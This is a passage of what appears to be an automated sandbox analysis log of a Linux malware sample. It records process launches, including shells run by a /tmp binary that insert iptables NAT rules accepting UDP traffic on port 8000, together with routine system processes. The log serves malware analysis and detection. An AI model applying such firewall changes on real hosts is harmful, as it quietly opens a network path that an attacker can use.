                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 8000 -j ACCEPT"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I PREROUTING -t nat -p udp --dport 8000 -j ACCEPT
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 8000 -j ACCEPT"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:36
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I POSTROUTING -t nat -p udp --sport 8000 -j ACCEPT
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:14:25
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/upstart
                                                                                                                            Arguments:n/a
                                                                                                                            File size:0 bytes
                                                                                                                            MD5 hash:00000000000000000000000000000000

                                                                                                                            General

                                                                                                                            Start time:21:14:25
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -e /proc/self/fd/9
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:14:25
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:14:25
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/date
                                                                                                                            Arguments:date
                                                                                                                            File size:68464 bytes
                                                                                                                            MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                                                                                                                            General

                                                                                                                            Start time:21:14:25
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:14:25
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/usr/share/apport/apport-checkreports
                                                                                                                            Arguments:/usr/bin/python3 /usr/share/apport/apport-checkreports --system
                                                                                                                            File size:1269 bytes
                                                                                                                            MD5 hash:1a7d84ebc34df04e55ca3723541f48c9

                                                                                                                            General

                                                                                                                            Start time:21:14:26
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/upstart
                                                                                                                            Arguments:n/a
                                                                                                                            File size:0 bytes
                                                                                                                            MD5 hash:00000000000000000000000000000000

                                                                                                                            General

                                                                                                                            Start time:21:14:26
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -e /proc/self/fd/9
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:14:26
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:14:26
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/date
                                                                                                                            Arguments:date
                                                                                                                            File size:68464 bytes
                                                                                                                            MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                                                                                                                            General

                                                                                                                            Start time:21:14:26
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:14:26
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/usr/share/apport/apport-gtk
                                                                                                                            Arguments:/usr/bin/python3 /usr/share/apport/apport-gtk
                                                                                                                            File size:23806 bytes
                                                                                                                            MD5 hash:ec58a49a30ef6a29406a204f28cc7d87

                                                                                                                            General

                                                                                                                            Start time:21:14:26
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/upstart
                                                                                                                            Arguments:n/a
                                                                                                                            File size:0 bytes
                                                                                                                            MD5 hash:00000000000000000000000000000000

                                                                                                                            General

                                                                                                                            Start time:21:14:26
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -e /proc/self/fd/9
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:14:26
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:14:26
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/date
                                                                                                                            Arguments:date
                                                                                                                            File size:68464 bytes
                                                                                                                            MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                                                                                                                            General

                                                                                                                            Start time:21:14:26
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:14:26
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/usr/share/apport/apport-gtk
                                                                                                                            Arguments:/usr/bin/python3 /usr/share/apport/apport-gtk
                                                                                                                            File size:23806 bytes
                                                                                                                            MD5 hash:ec58a49a30ef6a29406a204f28cc7d87